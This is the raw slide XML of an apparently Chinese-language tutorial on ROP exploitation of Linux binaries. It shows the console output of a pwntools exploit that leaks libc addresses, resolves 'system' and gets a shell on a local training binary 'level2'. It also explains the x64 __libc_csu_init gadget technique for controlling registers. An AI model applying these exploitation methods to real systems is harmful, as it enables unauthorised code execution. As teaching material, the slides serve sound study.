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7" r:id="rId3"/>
    <p:sldId id="278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5"/>
    <p:sldId id="260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  <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="290" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="291" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="293" r:id="rId39"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="296" r:id="rId41"/>
    <p:sldId id="298" r:id="rId42"/>
    <p:sldId id="297" r:id="rId43"/>
    <p:sldId id="300" r:id="rId44"/>
    <p:sldId id="301" r:id="rId45"/>
    <p:sldId id="302" r:id="rId46"/>
    <p:sldId id="303" r:id="rId47"/>
    <p:sldId id="304" r:id="rId48"/>
    <p:sldId id="299" r:id="rId49"/>
    <p:sldId id="305" r:id="rId50"/>
    <p:sldId id="30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he" initials="yh" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="342ca88ec7f04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31C86-71DC-46CE-AD2D-B74ECADCB49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851FB-6D1A-4C2C-81B9-9B7FBD4B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0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因为溢出点是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个字节，再加上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地址，我们可以计算出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$esp-144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的命令 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x/10s $esp-144”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，我们可以得到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0xbffff290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5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yun@ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:~/ROP_linux_x86$ python exp4.py </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[!] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> does not support 32-bit Python.  Use a 64-bit release.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[*] '/home/yun/ROP_linux_x86/level2'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    Arch:     i386-32-little</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    RELRO:    Partial RELRO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    Stack:    No canary found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    NX:       NX enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>    PIE:      No PIE (0x8048000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[+] Starting local process './level2':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4676</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8048000 =&gt; 7f454c46</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[+] Loading from '/home/yun/ROP_linux_x86/level2': 0xb77e7918</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x804a004 =&gt; 18797eb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[+] Resolving 'system' in 'libc.so': 0xb77e7918</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f14 =&gt; 01000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f1c =&gt; 0c000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f24 =&gt; 0d000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f2c =&gt; 19000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f34 =&gt; 1b000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f3c =&gt; 1a000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f44 =&gt; 1c000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f4c =&gt; f5feff6f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f54 =&gt; 05000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f5c =&gt; 06000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f64 =&gt; 0a000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f6c =&gt; 0b000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f74 =&gt; 15000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f7c =&gt; 03000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0x8049f80 =&gt; 00a00408</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77e7928 =&gt; 00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77e791c =&gt; 047c7eb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77e7c04 =&gt; 00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77e7924 =&gt; 087c7eb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77e7c0c =&gt; 747e7eb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77e7e74 =&gt; 00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77e7c14 =&gt; 58f87bb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf85c =&gt; 38f87bb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf838 =&gt; 2f6c6962</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf83c =&gt; 2f693338</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf840 =&gt; 362d6c69</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf844 =&gt; 6e75782d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf848 =&gt; 676e752f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf84c =&gt; 6c696263</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf850 =&gt; 2e736f2e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf854 =&gt; 36000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf858 =&gt; 00105fb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[!] No ELF provided.  Leaking is much faster if you have a copy of the ELF being leaked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb75f1000 =&gt; 7f454c46</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf860 =&gt; b02d7ab7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb75f1004 =&gt; 01010103</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2db0 =&gt; 01000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2db8 =&gt; 0e000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2dc0 =&gt; 0c000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2dc8 =&gt; 19000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2dd0 =&gt; 1b000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2dd8 =&gt; 04000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2de0 =&gt; f5feff6f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2de8 =&gt; 05000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2df0 =&gt; 06000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2df8 =&gt; 0a000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2e00 =&gt; 0b000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2e08 =&gt; 03000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a2e0c =&gt; 00307ab7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77a3004 =&gt; 58f87bb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77bf868 =&gt; 087c7eb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb77e7c18 =&gt; 18797eb7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb75f1180 =&gt; 474e5500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb75f1184 =&gt; d10743a8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb75f1188 =&gt; f3a9a7a2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb75f118c =&gt; e9807b1a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb75f1190 =&gt; f78026c0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0xb75f1194 =&gt; b5363f6b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[*] Trying lookup based on Build ID: d10743a8f3a9a7a2e9807b1af78026c0b5363f6b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[*] Using cached data from '/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/pwn-libc.so.d10743a8f3a9a7a2e9807b1af78026c0b5363f6b'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>system_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=0xb762bd80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###sending payload2 ...###</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[*] Switching to interactive mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$ id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=1000(yun) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=1000(yun) groups=1000(yun),4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>adm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>),24(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),27(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),30(dip),46(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>plugdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>),113(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>lpadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>),128(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sambashare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whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>yun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$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8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我们可以看到利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x40061a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处的代码我们可以控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbx,rbp,r12,r13,r14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r15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值，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随后利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x400600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处的代码我们将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值赋值给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, r14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值赋值给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rsi,r13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值赋值给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，随后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就会调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call qword </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [r12+rbx*8]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。这时候我们只要再将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值赋值为</a:t>
            </a:r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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，再通过精心构造栈上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的数据，我们就可以控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>去调用我们想要调用的函数了（比如说</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数）。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执行完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call qword </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [r12+rbx*8]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>之后，程序会对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，然后对比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值，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如果相等就会继续向下执行并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>到我们想要继续执行的地址。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所以为了让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值相等，我们可以将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值设置为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因为之前已经将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值设置为</a:t>
            </a:r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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>了。大概思路就是这样，我们下来构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
